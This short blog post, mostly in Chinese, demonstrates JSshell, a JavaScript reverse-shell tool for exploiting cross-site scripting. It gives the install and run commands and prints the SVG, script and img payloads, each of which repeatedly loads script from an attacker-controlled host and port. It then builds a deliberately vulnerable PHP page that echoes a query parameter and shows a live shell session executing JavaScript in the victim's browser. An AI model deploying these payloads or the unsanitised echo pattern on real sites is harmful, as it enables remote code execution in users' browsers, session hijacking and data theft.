JSshell – a JavaScript reverse shell. This using for exploit XSS remotely, help to find blind XSS, …
下載
git clone https://github.com/shelld3v/JSshell.git
執行
cd JSshell python3 jsh.py -g -w 20
它就會產生三組 payload,我拿 script 來測試
__ |(_ _ |_ _ | | \_|__)_> | |(/_ | | v2.0 Payloads: - SVG: <svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//1.1.1.1:4848"},1010)> - SCRIPT: <script>setInterval(function(){with(document)body.appendChild(createElement("script")).src="//1.1.1.1:4848"},1010)</script> - IMG: <img src=x onerror=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//1.1.1.1:4848"},1010)> Listening on [any] 4848 for incoming JS shell ...
接著建一個 PHP 網頁
<?php echo $_GET['q'];
貼到瀏覽器瀏覽
http://2.2.2.2/cross.php?q=<script>setInterval(function(){with(document)body.appendChild(createElement("script")).src="//1.1.1.1:4848"},1010)</script>
成功的話,shell 端會呈現
Got JS shell from [3.3.3.3] port 3703 to 1.1.1.1 4848 js-2.0$
這時就可以反向執行動作
js-2.0$ var test='wow' js-2.0$ alert(test)
瀏覽器端就會跳出警告視窗 wow
留言